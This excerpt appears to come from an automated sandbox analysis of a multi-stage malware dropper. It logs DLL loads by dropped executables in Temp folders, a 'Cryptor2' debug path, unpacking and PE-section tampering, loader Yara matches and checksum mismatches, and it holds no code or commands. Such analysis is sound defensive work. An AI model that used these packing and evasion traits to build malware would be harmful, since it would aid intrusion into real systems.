Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static file information: File size 3292160 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: Raw size of isvciprd is bigger than: 0x100000 < 0x2b7c00

Source:	Binary string: C:\Users\Administrator\Desktop\Cryptor2\Workspace\940993430\Project\Release\Project.pdb source: a629a70424.exe, 00000018.00000002.2856948317.000000000035C000.00000002.00000001.01000000.00000012.sdmp, a629a70424.exe, 00000018.00000003.2766493477.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000000.2342375284.000000000035C000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: BlueMail.exe, 0000000E.00000002.2329718072.00000000060F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: BlueMail.exe, BlueMail.exe, 0000000E.00000002.2329718072.00000000060F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: BlueMail.exe, 0000000E.00000002.2328768604.0000000005E90000.00000004.08000000.00040000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: BlueMail.exe, 0000000E.00000002.2328768604.0000000005E90000.00000004.08000000.00040000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.e00000.0.unpack :EW;.rsrc:W;.idata :W;isvciprd:EW;bfywzfjw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;isvciprd:EW;bfywzfjw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 7.2.skotes.exe.360000.0.unpack :EW;.rsrc:W;.idata :W;isvciprd:EW;bfywzfjw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;isvciprd:EW;bfywzfjw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Unpacked PE file: 17.2.c2bea0d661.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.00cfg:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Unpacked PE file: 20.2.8f25543307.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pbmurklf:EW;kltrprsa:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Unpacked PE file: 45.2.9f2ded7baa.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zzjczccs:EW;kizckzqk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zzjczccs:EW;kizckzqk:EW;.taggant:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Unpacked PE file: 17.2.c2bea0d661.exe.400000.0.unpack

.NET source code contains potential unpacker

Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 14.2.BlueMail.exe.5de0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.2582870539.0000000002802000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2328283170.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2710996354.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2587726358.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2270653977.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BlueMail.exe PID: 5640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Gxtuum.exe PID: 6836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Gxtuum.exe PID: 1252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vmwin.exe PID: 6304, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Code function: 17_2_0081C858 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

17_2_0081C858

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 8f25543307.exe.12.dr	Static PE information: real checksum: 0x1dc34f should be: 0x1de539
Source: random[3].exe.12.dr	Static PE information: real checksum: 0x2af6ba should be: 0x2ba70c
Source: random[2].exe0.12.dr	Static PE information: real checksum: 0x1bc18e should be: 0x1c3abb
Source: vmwin.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x134d19
Source: BlueMail.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x134d19
Source: 9f2ded7baa.exe.12.dr	Static PE information: real checksum: 0x1bc18e should be: 0x1c3abb
Source: 9ffcf1ab77.exe.12.dr	Static PE information: real checksum: 0x2af6ba should be: 0x2ba70c
Source: BlueMail[1].exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x134d19
Source: random[1].exe1.12.dr	Static PE information: real checksum: 0x1dc34f should be: 0x1de539
Source: file.exe	Static PE information: real checksum: 0x33002d should be: 0x32c825
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x33002d should be: 0x32c825

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: isvciprd
Source: file.exe	Static PE information: section name: bfywzfjw
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
